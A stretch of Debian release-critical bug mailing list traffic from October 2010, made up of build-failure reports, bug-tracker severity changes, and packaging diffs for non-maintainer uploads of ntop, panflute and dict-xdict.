 I understand that this behavior was not what you expected. And I'm on
 your side that the Break button should actually do something instead
 of just waiting for the operation to finish halfway and lose everything
 that should have been moved after pressing it. I'll forward your
 complaint to the upstream developer to have it fixed.
 
 Not sure I'd agree on the grave severity but I'll leave it at that and
 see what the developer will do.
 
Any news?

Cheers,
Julien


signature.asc
Description: Digital signature


Bug#599963: libverilog-perl: FTBFS on mips: Terminated after t/34_parser.t

2010-10-19 Thread Salvatore Bonaccorso
Hi 

On Tue, Oct 12, 2010 at 02:42:35PM +0200, Cyril Brulebois wrote:
 Source: libverilog-perl
 Version: 3.303-1
 Severity: serious
 Justification: FTBFS
 
 Hi,
 
 your package no longer builds on mips:
 | PERL_DL_NONLAZY=1 /usr/bin/perl -MExtUtils::Command::MM -e 
 test_harness(0, 'blib/lib', 'blib/arch') t/*.t
 | t/00_pod.t ... ok
 | t/01_manifest.t .. ok
 | t/02_help.t .. ok
 | t/03_spaces.t  ok
 | t/04_critic.t  ok
 | t/05_yaml.t .. ok
 | t/10_keywords.t .. ok
 | t/12_splitbus.t .. ok
 | t/14_numbers.t ... ok
 | t/16_std.t ... ok
 | t/20_getopt.t  ok
 | t/30_preproc.t ... ok
 | t/32_noinc.t . ok
 | t/34_parser.t  ok
 | E: Caught signal 'Terminated': terminating immediately
 | make[1]: *** [test_dynamic] Terminated
 | make: *** [build] Terminated
 
 Full build logs:
   https://buildd.debian.org/status/package.php?p=libverilog-perl

Ok, I tried to build libverilog-perl 3.303 on gabrielli.d.o and it
seems the build hangs on t/35_sigparser.t. Looking at [1] the first
version the problem arises for mips and mipsel was 3.301-1.

 [1] https://buildd.debian.org/build.cgi?pkg=libverilog-perldist=unstable

Bests
Salvatore


signature.asc
Description: Digital signature


Processed: fixed 600177 in 3.2.10-dfsg-1

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 fixed 600177 3.2.10-dfsg-1
Bug #600177 [virtualbox-ose] virtualbox-ose: out of disk while merging a 
snapshot destroys the disk image
Bug Marked as fixed in versions virtualbox-ose/3.2.10-dfsg-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600177: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600177
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 600667 is grave

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 600667 grave
Bug #600667 [eglibc] eglibc: cve-2010-3847 dynamic linker expands $ORIGIN in 
setuid library search path
Severity set to 'grave' from 'critical'

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600667: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600667
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 595591 is wishlist, retitle 595591 to frontaccounting fails to install noninteractively

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 595591 wishlist
Bug #595591 [frontaccounting] frontaccounting: fails to install
Severity set to 'wishlist' from 'serious'

 retitle 595591 frontaccounting fails to install noninteractively
Bug #595591 [frontaccounting] frontaccounting: fails to install
Changed Bug title to 'frontaccounting fails to install noninteractively' from 
'frontaccounting: fails to install'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
595591: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=595591
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#590418: libxr: FTBFS: make[2]: *** [doxy] Segmentation fault

2010-10-19 Thread Alexander Reichle-Schmehl
Hi!

* Lucas Nussbaum lu...@lucas-nussbaum.net [100901 19:42]:
make[2]: Entering directory 
`/build/user-libxr_1.0-1-amd64-8pPxnk/libxr-1.0/docs'
SRCDIR=.. OUTDIR=. \
PROJECT=libxr VERSION=1.0 \
  doxygen ./Doxyfile
warning: Tag `USE_WINDOWS_ENCODING' at line 11 of file ./Doxyfile has 
become obsolete.
To avoid this warning please update your configuration file using 
doxygen -u
warning: Tag `DETAILS_AT_TOP' at line 23 of file ./Doxyfile has become 
obsolete.
To avoid this warning please update your configuration file using 
doxygen -u
warning: Tag `MAX_DOT_GRAPH_WIDTH' at line 217 of file ./Doxyfile has 
become obsolete.
To avoid this warning please update your configuration file using 
doxygen -u
warning: Tag `MAX_DOT_GRAPH_HEIGHT' at line 218 of file ./Doxyfile has 
become obsolete.
To avoid this warning please update your configuration file using 
doxygen -u
warning: source ../tests/zblok is not a readable file or directory... 
skipping.
make[2]: *** [doxy] Segmentation fault
  There's been a couple doxygen uploads since this bug was filed, I don't
  suppose this was fixed?
 It was still failing on August 15th. I haven't run a rebuild since then.

Just tested still fails. The obsolete tags seem to be irrelevant;
running the recommended doxygen -u doesn't fix the segfault (that would
have been to easy, wouldn't it?)


Best Regards,
  Alexander



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 593736 is important, tagging 593736

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 593736 important
Bug #593736 [glpi] glpi: Never creates the database or gathers connection 
information.
Severity set to 'important' from 'grave'

 tags 593736 + moreinfo unreproducible
Bug #593736 [glpi] glpi: Never creates the database or gathers connection 
information.
Added tag(s) unreproducible and moreinfo.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
593736: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=593736
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: ntop: diff for NMU version 3:3.3-14.1

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 595446 + patch
Bug #595446 [ntop] ntop: GPL code links openssl without a license exception
Added tag(s) patch.
 tags 595446 + pending
Bug #595446 [ntop] ntop: GPL code links openssl without a license exception
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
595446: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=595446
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#595446: ntop: diff for NMU version 3:3.3-14.1

2010-10-19 Thread Alexander Reichle-Schmehl
tags 595446 + patch
tags 595446 + pending
thanks

Dear maintainer,

I've prepared an NMU for ntop (versioned as 3:3.3-14.1) and
uploaded it to DELAYED/5. Please feel free to tell me if I
should delay it longer.

While it is a quite grave change to deactivate ssl support, it is my
understanding, that it is the only viable solution for squeeze.

Regards.
diff -u ntop-3.3/debian/control ntop-3.3/debian/control
--- ntop-3.3/debian/control
+++ ntop-3.3/debian/control
@@ -2,7 +2,7 @@
 Section: net
 Priority: optional
 Maintainer: Ola Lundqvist o...@debian.org
-Build-Depends: debhelper (= 4.1.39), libpcap0.8-dev, autoconf, automake1.7, libgdbm-dev, libpng12-dev, libncurses5-dev, libtool, libwrap0-dev, libgd2-noxpm-dev, libssl-dev, libjpeg62-dev, po-debconf, librrd2-dev
+Build-Depends: debhelper (= 4.1.39), libpcap0.8-dev, autoconf, automake1.7, libgdbm-dev, libpng12-dev, libncurses5-dev, libtool, libwrap0-dev, libgd2-noxpm-dev, libjpeg62-dev, po-debconf, librrd2-dev
 Standards-Version: 3.7.2
 
 Package: ntop
diff -u ntop-3.3/debian/rules ntop-3.3/debian/rules
--- ntop-3.3/debian/rules
+++ ntop-3.3/debian/rules
@@ -20,7 +20,7 @@
 		--with-zlib-lib=/usr/lib --with-zlib-include=/usr/include \
 		--with-libpng-lib=/usr/lib --with-libpng-include=/usr/include \
 		--with-gd-lib=/usr/lib --with-gd-include=/usr/include \
-	--enable-sslv3 --enable-i18n --disable-snmp
+	--enable-i18n --disable-snmp
 
 	touch configure-stamp-ntop
 
diff -u ntop-3.3/debian/changelog ntop-3.3/debian/changelog
--- ntop-3.3/debian/changelog
+++ ntop-3.3/debian/changelog
@@ -1,3 +1,12 @@
+ntop (3:3.3-14.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Compile without ssl support due to license problems (Closes: #595446)
+* removed build-depends on libssl-dev
+* removed ssl option from configure call
+
+ -- Alexander Reichle-Schmehl toli...@debian.org  Tue, 19 Oct 2010 14:29:41 +0200
+
 ntop (3:3.3-14) unstable; urgency=low
 
   * Logcheck will now ignore packet truncated warnings. Closes: #585525.
diff -u ntop-3.3/debian/po/fr.po ntop-3.3/debian/po/fr.po
--- ntop-3.3/debian/po/fr.po
+++ ntop-3.3/debian/po/fr.po
@@ -7,8 +7,8 @@
 # /usr/share/doc/po-debconf/README-trans
 # or http://www.debian.org/intl/l10n/po-debconf/README-trans
 # Developers do not need to manually edit POT or PO files.
-# 
-# 
+#
+#
 msgid 
 msgstr 
 Project-Id-Version: ntop 2:3.2rc1-1\n
@@ -17,6 +17,7 @@
 PO-Revision-Date: 2005-09-29 00:13+0200\n
 Last-Translator: Sylvain Archenault sylvain.archena...@laposte.net\n
 Language-Team: French debian-l10n-fre...@lists.debian.org\n
+Language: fr\n
 MIME-Version: 1.0\n
 Content-Type: text/plain; charset=iso-8859-15\n
 Content-Transfer-Encoding: 8bit\n
diff -u ntop-3.3/debian/po/sv.po ntop-3.3/debian/po/sv.po
--- ntop-3.3/debian/po/sv.po
+++ ntop-3.3/debian/po/sv.po
@@ -8,8 +8,8 @@
 # or http://www.debian.org/intl/l10n/po-debconf/README-trans
 # Developers do not need to manually edit POT or PO files.
 # , fuzzy
-# 
-# 
+#
+#
 msgid 
 msgstr 
 Project-Id-Version: ntop 2:3.2rc1-1\n
@@ -18,6 +18,7 @@
 PO-Revision-Date: 2005-10-10 22:03+0200\n
 Last-Translator: Daniel Nylander p...@danielnylander.se\n
 Language-Team: Swedish s...@li.org\n
+Language: sv\n
 MIME-Version: 1.0\n
 Content-Type: text/plain; charset=iso-8859-1\n
 Content-Transfer-Encoding: 8bit\n
diff -u ntop-3.3/debian/po/nl.po ntop-3.3/debian/po/nl.po
--- ntop-3.3/debian/po/nl.po
+++ ntop-3.3/debian/po/nl.po
@@ -19,6 +19,7 @@
 PO-Revision-Date: 2006-04-27 10:04+0200\n
 Last-Translator: Esther eha...@xs4all.nl\n
 Language-Team: Nederlands debian-l10n-du...@lists.debian.org\n
+Language: \n
 MIME-Version: 1.0\n
 Content-Type: text/plain; charset=UTF-8\n
 Content-Transfer-Encoding: 8bit\n
diff -u ntop-3.3/debian/po/it.po ntop-3.3/debian/po/it.po
--- ntop-3.3/debian/po/it.po
+++ ntop-3.3/debian/po/it.po
@@ -11,6 +11,7 @@
 PO-Revision-Date: 2006-05-07 19:33+0200\n
 Last-Translator: Luca Monducci luca...@tiscali.it\n
 Language-Team: Italian t...@lists.linux.it\n
+Language: it\n
 MIME-Version: 1.0\n
 Content-Type: text/plain; charset=ISO-8859-1\n
 Content-Transfer-Encoding: 8bit\n
diff -u ntop-3.3/debian/po/de.po ntop-3.3/debian/po/de.po
--- ntop-3.3/debian/po/de.po
+++ ntop-3.3/debian/po/de.po
@@ -12,6 +12,7 @@
 PO-Revision-Date: 2006-10-29 20:57+0100\n
 Last-Translator: Helge Kreutzmann deb...@helgefjell.de\n
 Language-Team: de debian-l10n-ger...@lists.debian.org\n
+Language: \n
 MIME-Version: 1.0\n
 Content-Type: text/plain; charset=ISO-8859-15\n
 Content-Transfer-Encoding: 8bit\n
diff -u ntop-3.3/debian/po/es.po ntop-3.3/debian/po/es.po
--- ntop-3.3/debian/po/es.po
+++ ntop-3.3/debian/po/es.po
@@ -33,7 +33,9 @@
 POT-Creation-Date: 2006-08-16 07:38+0200\n
 PO-Revision-Date: 2006-12-25 12:11-0500\n
 Last-Translator: Rudy Godoy r...@kernel-panik.org\n
-Language-Team: Debian l10n Spanish Team debian-l10n-span...@lists.debian.org\n
+Language-Team: Debian l10n Spanish Team debian-l10n-span...@lists.debian.
+org\n
+Language: \n
 MIME-Version: 1.0\n
 

Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread Alexander Reichle-Schmehl
Hi!

Am 19.10.2010 10:42, schrieb Alexander Reichle-Schmehl:

 I can reproduce this bug in about 3/4 of the build tests using
 monkeysphere 0.31-1 and a simple pbuilder with a minimal configuration:
 Hi, Alexander.  New versions of this package have been uploaded that
 claim to fix this issue, and the issue was subsequently closed.  Are you
 still having a problem with the new versions?
 Looks promising.  I compiled it four times, and all four build attempts
 succeeded.

 Luckily I don't need the system I could reproduce the error for some
 time, so I'll keep on letting it build monkeyspehere and report back in
 a couple of hours.

I just came back and have some good news and some bad news.

The good news is, that from the 100 builds of 0.33-1 I just did, 92
succeeded (which is a far better result that with 0.31-3).  The bad news
is, that in all of the the 8 failed builds, it always stopped at a
different point.  I copied the full build logs of the failed builds to
http://people.debian.org/~tolimar/tmp/ ; I could make anything out of them.


Best regards,
  Alexander



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread Alexander Reichle-Schmehl
Hi!

Am 19.10.2010 15:28, schrieb Alexander Reichle-Schmehl:

 [..] The bad news
 is, that in all of the the 8 failed builds, it always stopped at a
 different point.  I copied the full build logs of the failed builds to
 http://people.debian.org/~tolimar/tmp/ ; I could make anything out of them.

Ouch; actually all builds would have succeeded if they had enough
entropy available.  Every time they stopped my system seems to have run
out of entropy, and as I thought something was wrong I terminated the
builds, why they where indeed just waiting for some input.

Sorry for the noise:  Yes the build problem original reported has been
fixed (at least i can't reproduce it any more).

Best regards,
  Alexander



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#591118: monkeysphere: FTBFS: test failed

2010-10-19 Thread Jameson Rollins
On Tue, 19 Oct 2010 15:34:10 +0200, Alexander Reichle-Schmehl 
alexan...@schmehl.info wrote:
 Am 19.10.2010 15:28, schrieb Alexander Reichle-Schmehl:
 
  [..] The bad news
  is, that in all of the the 8 failed builds, it always stopped at a
  different point.  I copied the full build logs of the failed builds to
  http://people.debian.org/~tolimar/tmp/ ; I could make anything out of them.
 
 Ouch; actually all builds would have succeeded if they had enough
 entropy available.  Every time they stopped my system seems to have run
 out of entropy, and as I thought something was wrong I terminated the
 builds, why they where indeed just waiting for some input.

Ok, thanks so much for the detailed tests and report, Alexander.  We
very much appreciate it.

I'm relieved that it's not a problem with the monkeysphere test per se,
but it's still to bad that the test is eating up so much entropy.  I
think the test is using the smallest keys it can get away with, but
maybe we can find some other ways to reduce entropy consumption so that
we don't run into the same problem when running bulk tests like this in
the future.

jamie.


pgppHUu7CCMjd.pgp
Description: PGP signature


Processed: panflute: diff for NMU version 0.6.2-1.1

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 597590 + patch
Bug #597590 [panflute-applet] panflute-applet: Not able to add applet
Added tag(s) patch.
 tags 597590 + pending
Bug #597590 [panflute-applet] panflute-applet: Not able to add applet
Ignoring request to alter tags of bug #597590 to the same tags previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
597590: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=597590
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#597590: panflute: diff for NMU version 0.6.2-1.1

2010-10-19 Thread Alexander Reichle-Schmehl
tags 597590 + patch
tags 597590 + pending
thanks

Dear maintainer,

I've prepared an NMU for panflute (versioned as 0.6.2-1.1) and
uploaded it to DELAYED/2. Please feel free to tell me if I
should delay it longer.

Regards.
diff -Nru panflute-0.6.2/debian/changelog panflute-0.6.2/debian/changelog
--- panflute-0.6.2/debian/changelog	2010-07-01 20:00:35.0 +0200
+++ panflute-0.6.2/debian/changelog	2010-10-19 16:18:13.0 +0200
@@ -1,3 +1,10 @@
+panflute (0.6.2-1.1) unstable; urgency=low
+
+  * Non-maintainer upload.
+  * Add depends on python-gnomeapplet (Closes: #597590)
+
+ -- Alexander Reichle-Schmehl toli...@debian.org  Tue, 19 Oct 2010 16:18:11 +0200
+
 panflute (0.6.2-1) unstable; urgency=low
 
   * Initial release. (Closes: #586348)
diff -Nru panflute-0.6.2/debian/control panflute-0.6.2/debian/control
--- panflute-0.6.2/debian/control	2010-06-27 20:22:19.0 +0200
+++ panflute-0.6.2/debian/control	2010-10-19 16:18:08.0 +0200
@@ -63,6 +63,7 @@
  gnome-panel,
  panflute-daemon (= ${binary:Version}),
  python-dbus (= 0.80),
+ python-gnomeapplet,
  python-gnomedesktop,
  python-gobject,
  python-gtk2 (= 2.16),


Bug#597566: clamav-getfiles: Fails to create package with multiple perl undefined reference errors

2010-10-19 Thread Eric Reischer

Any updates?



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#597208: marked as done (bindgraph: fails to install)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 16:44:41 +0200
with message-id 2010101911.gv10...@melusine.alphascorpii.net
and subject line Bug closes with 0.2a-5.1
has caused the Debian Bug report #597208,
regarding bindgraph: fails to install
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
597208: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=597208
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: bindgraph
Version: 0.2a-5
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts piuparts.d.o

Hi, 

during a test with piuparts I noticed your package failed to install. As per 
definition of the release team this makes the package too buggy for a 
release, thus the severity.

From the attached log (scroll to the bottom...):

  Selecting previously deselected package bindgraph.
  (Reading database ... 8263 files and directories currently installed.)
  Unpacking bindgraph (from .../bindgraph_0.2a-5_all.deb) ...
  Setting up bindgraph (0.2a-5) ...
  chown: cannot access `/var/run/servergraph': No such file or directory
  dpkg: error processing bindgraph (--configure):
   subprocess installed post-installation script returned error exit status 1
  Errors were encountered while processing:
   bindgraph
  E: Sub-process /usr/bin/dpkg returned an error code (1)


cheers,
Holger
Start: 2010-05-18 21:15:26 UTC

Package: bindgraph
Priority: extra
Section: admin
Installed-Size: 156
Maintainer: Jose Luis Tallon jltal...@adv-solutions.net
Architecture: all
Version: 0.2a-5
Depends: libfile-tail-perl, librrds-perl, debconf (= 0.5) | debconf-2.0
Recommends: httpd, bind9
Filename: pool/main/b/bindgraph/bindgraph_0.2a-5_all.deb
Size: 24270
MD5sum: cb7b065c98a40111d1951b55147df815
SHA1: 743acbec989d0be99152673d7a077730ba799c6a
SHA256: fadaf842941ddd90f5d84d76efc0f36c5a84f738ee27b98723a480469ddf3b19
Description: DNS statistics RRDtool frontend for BIND9
 BindGraph is a very simple DNS statistics RRDtool frontend for
 BIND9 that produces daily, weekly, monthly and yearly graphs of
 the DNS server's activity (queries, errors, etc.).
Tag: implemented-in::perl, interface::commandline, protocol::dns, role::program, scope::utility, use::monitor, works-with::db, works-with::logfile

Executing: sudo /org/piuparts.debian.org/sbin/piuparts --warn-symlinks --warn-on-others --warn-on-leftovers-after-purge --scriptsdir /etc/piuparts/scripts/ --tmpdir /org/piuparts.debian.org/tmp -ad squeeze -b squeeze.tar.gz --mirror http://piatti.debian.org/debian/ bindgraph
Guessed: debian
0m0.0s INFO: --
0m0.0s INFO: To quickly glance what went wrong, scroll down to the bottom of this logfile.
0m0.0s INFO: FAQ available at http://wiki.debian.org/piuparts/FAQ
0m0.0s INFO: --
0m0.0s INFO: piuparts version 0.39~201005180735 starting up.
0m0.0s INFO: Command line arguments: /org/piuparts.debian.org/sbin/piuparts --warn-symlinks --warn-on-others --warn-on-leftovers-after-purge --scriptsdir /etc/piuparts/scripts/ --tmpdir /org/piuparts.debian.org/tmp -ad squeeze -b squeeze.tar.gz --mirror http://piatti.debian.org/debian/ bindgraph
0m0.0s INFO: Running on: Linux piatti 2.6.32.13-dsa-amd64 #1 SMP Fri May 14 10:29:18 CEST 2010 x86_64
0m0.0s DEBUG: Created temporary directory /org/piuparts.debian.org/tmp/tmpbMq1o2
0m0.0s DEBUG: Unpacking squeeze.tar.gz into /org/piuparts.debian.org/tmp/tmpbMq1o2
0m0.0s DEBUG: Starting command: ['tar', '-C', '/org/piuparts.debian.org/tmp/tmpbMq1o2', '-zxf', 'squeeze.tar.gz']
0m1.8s DEBUG: Command ok: ['tar', '-C', '/org/piuparts.debian.org/tmp/tmpbMq1o2', '-zxf', 'squeeze.tar.gz']
0m1.8s DEBUG: Created policy-rc.d and chmodded it.
0m1.8s DEBUG: Starting command: ['chroot', '/org/piuparts.debian.org/tmp/tmpbMq1o2', 'apt-get', 'update']
0m3.8s DUMP: 
  Get:1 http://piatti.debian.org squeeze Release.gpg [835B]
  Get:2 http://piatti.debian.org squeeze Release [89.5kB]
  Ign http://piatti.debian.org squeeze/main Packages/DiffIndex
  Ign http://piatti.debian.org squeeze/contrib Packages/DiffIndex
  Ign http://piatti.debian.org squeeze/non-free Packages/DiffIndex
  Get:3 http://piatti.debian.org squeeze/main Packages [8443kB]
  Get:4 http://piatti.debian.org squeeze/contrib Packages [61.4kB]
  Get:5 http://piatti.debian.org squeeze/non-free Packages [120kB]
  Fetched 8715kB in 1s (8074kB/s)
  Reading package lists...
0m3.8s DEBUG: Command ok: ['chroot', '/org/piuparts.debian.org/tmp/tmpbMq1o2', 'apt-get', 'update']
0m3.8s DEBUG: Starting 

Bug#591193: FYI

2010-10-19 Thread Marcos Marado
Upstream doesn't provide the original source for this two swf's but:
1) since both are meant to be easilly redimensioned;
2) they are basicly one blank image, and another blank image with the 
text this ad zapped in blue letters, and it doesn't really matter if 
they don't look like the original;
it shouldn't be hard to provide replacements (with source code). Talking with 
upstream might also not be a bad idea. Unfortunately I don't know anything 
about flash, but I would suppose that this is a couple-of-minutes task for 
someone who knows how to do those thingies...

-- 
Marcos Marado



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#574219: dict-xdict: NMU diff for 0.1-4.2

2010-10-19 Thread jari . aalto

Dear maintainer,

I have some free time and I'd like to offer help.

Here is the NMU diff according to DevRef 5.11.1[1][2] for bug: #574219.
See the debian/patches directory for the important fixes.

Please let me know if anything needs correction or if the above is
acceptable.

Thank you for maintaining the package,
Jari Aalto

[1] http://www.debian.org/doc/developers-reference/pkgs.html#nmu
[2] http://dep.debian.net/deps/dep1.html

lsdiff(1) of changes:

dict-xdict-0.1/debian/changelog
dict-xdict-0.1/debian/compat
dict-xdict-0.1/debian/control
dict-xdict-0.1/debian/copyright
dict-xdict-0.1/debian/patches/10-Dictionary.patch
dict-xdict-0.1/debian/patches/series
dict-xdict-0.1/debian/postrm
dict-xdict-0.1/debian/rules
dict-xdict-0.1/debian/source/format
dict-xdict-0.1/debian/watch
dict-xdict-0.1/Dictionary

diffstat for dict-xdict-0.1 dict-xdict-0.1

 Dictionary |   55 +---
 debian/changelog   |   26 ---
 debian/compat  |2 
 debian/control |4 
 debian/copyright   |2 
 debian/patches/10-Dictionary.patch |  243 -
 debian/patches/series  |1 
 debian/postrm  |   25 +--
 debian/rules   |2 
 debian/source/format   |1 
 debian/watch   |4 
 11 files changed, 51 insertions(+), 314 deletions(-)

diff -Nru dict-xdict-0.1/debian/changelog dict-xdict-0.1/debian/changelog
--- dict-xdict-0.1/debian/changelog	2010-10-19 19:28:11.0 +0300
+++ dict-xdict-0.1/debian/changelog	2010-10-19 19:30:12.0 +0300
@@ -1,29 +1,3 @@
-dict-xdict (0.1-4.2) unstable; urgency=low
-
-  * Non-maintainer upload.
-- Move to packaging format 3.0 (quilt).
-  * debian/compat
-- Update to 8.
-  * debian/control
-- (Build-Depends): Update to debhelper 8.
-- (Standards-Version): Update to 3.9.1.
-  * debian/copyright
-- Point to GPL-2.
-  * debian/postrm
-- (remove|purge): Check whether /etc/init.d/dictd exists and only then
-  call invoke-rc.d or init.d script. Patch thanks to Hideki Yamane
-  henr...@debian.or.jp (serious; Closes: #574219).
-  * debian/patches
- - (10): New. Convert direct changes to a patch (Lintian).
-  * debian/rules
- - (install): Update dh_clean -k to dh_prep.
-   * debian/source/format
- - New file.
-  * debian/watch
- - New file.
-
- -- Jari Aalto jari.aa...@cante.net  Tue, 19 Oct 2010 19:28:11 +0300
-
 dict-xdict (0.1-4.1) unstable; urgency=low
 
   * Non-maintainer upload.
diff -Nru dict-xdict-0.1/debian/compat dict-xdict-0.1/debian/compat
--- dict-xdict-0.1/debian/compat	2010-10-19 19:24:20.0 +0300
+++ dict-xdict-0.1/debian/compat	2010-10-19 19:30:12.0 +0300
@@ -1 +1 @@
-8
+4
diff -Nru dict-xdict-0.1/debian/control dict-xdict-0.1/debian/control
--- dict-xdict-0.1/debian/control	2010-10-19 19:24:20.0 +0300
+++ dict-xdict-0.1/debian/control	2010-10-19 19:30:12.0 +0300
@@ -2,9 +2,9 @@
 Section: text
 Priority: optional
 Maintainer: Emfox Zhou em...@debian.org
-Build-Depends: debhelper (= 8)
+Build-Depends: debhelper (= 4.0.0)
 Build-Depends-Indep: dictfmt, dictzip
-Standards-Version: 3.9.1
+Standards-Version: 3.7.3
 
 Package: dict-xdict
 Architecture: all
diff -Nru dict-xdict-0.1/debian/copyright dict-xdict-0.1/debian/copyright
--- dict-xdict-0.1/debian/copyright	2010-10-19 19:24:20.0 +0300
+++ dict-xdict-0.1/debian/copyright	2010-10-19 19:30:12.0 +0300
@@ -20,5 +20,5 @@
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301 USA
 
 On Debian systems, the complete text of the GNU General
-Public License can be found in /usr/share/common-licenses/GPL-2.
+Public License can be found in `/usr/share/common-licenses/GPL'.
 
diff -Nru dict-xdict-0.1/debian/patches/10-Dictionary.patch dict-xdict-0.1/debian/patches/10-Dictionary.patch
--- dict-xdict-0.1/debian/patches/10-Dictionary.patch	2010-10-19 19:26:28.0 +0300
+++ dict-xdict-0.1/debian/patches/10-Dictionary.patch	1970-01-01 02:00:00.0 +0200
@@ -1,243 +0,0 @@
-From 53b53718871ebb40434c21798939c78d8fac9c4e Mon Sep 17 00:00:00 2001
-From: Jari Aalto jari.aa...@cante.net
-Date: Tue, 19 Oct 2010 19:26:11 +0300
-Subject: [PATCH] Dictionary: Debian chnages (unknown author)
-Organization: Private
-Content-Type: text/plain; charset=utf-8
-Content-Transfer-Encoding: 8bit
-
-
-Signed-off-by: Jari Aalto jari.aa...@cante.net

- Dictionary |   55 ---
- 1 files changed, 36 insertions(+), 19 deletions(-)
-
-diff --git a/Dictionary b/Dictionary
-index d615a41..b4e9548 100644
 a/Dictionary
-+++ b/Dictionary
-@@ -48,31 +48,27 @@ _
- 
- gif
- .GIF
--   图形文件扩展名,( GRAPHICS INTERCHANGE FORMAT
--的缩写。一种可以提供计算机之间高效传输的图形文件格式)
-+   图形文件扩展名, (GRAPHICS INTERCHANGE FORMAT 的缩写。一种可以提供计算机之间高效传输的图形文件格式)
- _
- 
- 

Bug#600739: dh-make-drupal: ends up with ERROR: undefined method `/' for nil:NilClass for every module

2010-10-19 Thread Benjamin BAYART

Package: dh-make-drupal
Version: 0.7-1
Severity: grave
Justification: renders package unusable


Here is the kind of output I obtain:
mustrum:~# dh-make-drupal --debug 5 wysiwyg
D:Setting configuration key «d_ver» to «6»
D:Setting configuration key «min_status» to «recommended»
D:Setting configuration key «force_overwrite» to «false»
D:Setting configuration key «debug» to «5»
D:Setting configuration key «report_only» to «false»
D:Setting configuration key «debianize» to «true»
D:Setting configuration key «skip_build» to «false»
D:Setting configuration key «skip_recommend» to «false»
D:Setting configuration key «switches» to «-us -uc»
D:Setting configuration key «tarball» to «false»
D:Setting configuration key «proj_version» to «false»
D:Setting configuration key «proj_type» to «Modules»
D:Setting configuration key «mangle_version» to «true»
D:Preparing package for 'wysiwyg' for Drupal 6, status = recommended
D:Fetching project information from http://drupal.org/project/wysiwyg
ERROR: undefined method `/' for nil:NilClass

Probably something weird going wrong, but failed to guess what (can be
related to dependencies). My debian install is quite, well, geeky, used
to be a version (lenny, I guess), upgraded several times, partially, to
various parts of sid. So, quite no chance it is anything like coherent
in versions, except if depends are good in the package description :)



-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-1-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.ISO-8859-15, LC_CTYPE=en_US.ISO-8859-15 (charmap=ISO-8859-15)
Shell: /bin/sh linked to /bin/bash

Versions of packages dh-make-drupal depends on:
ii  build-essential   11.5   Informational list of build-essent
ii  debhelper 8.0.0  helper programs for debian/rules
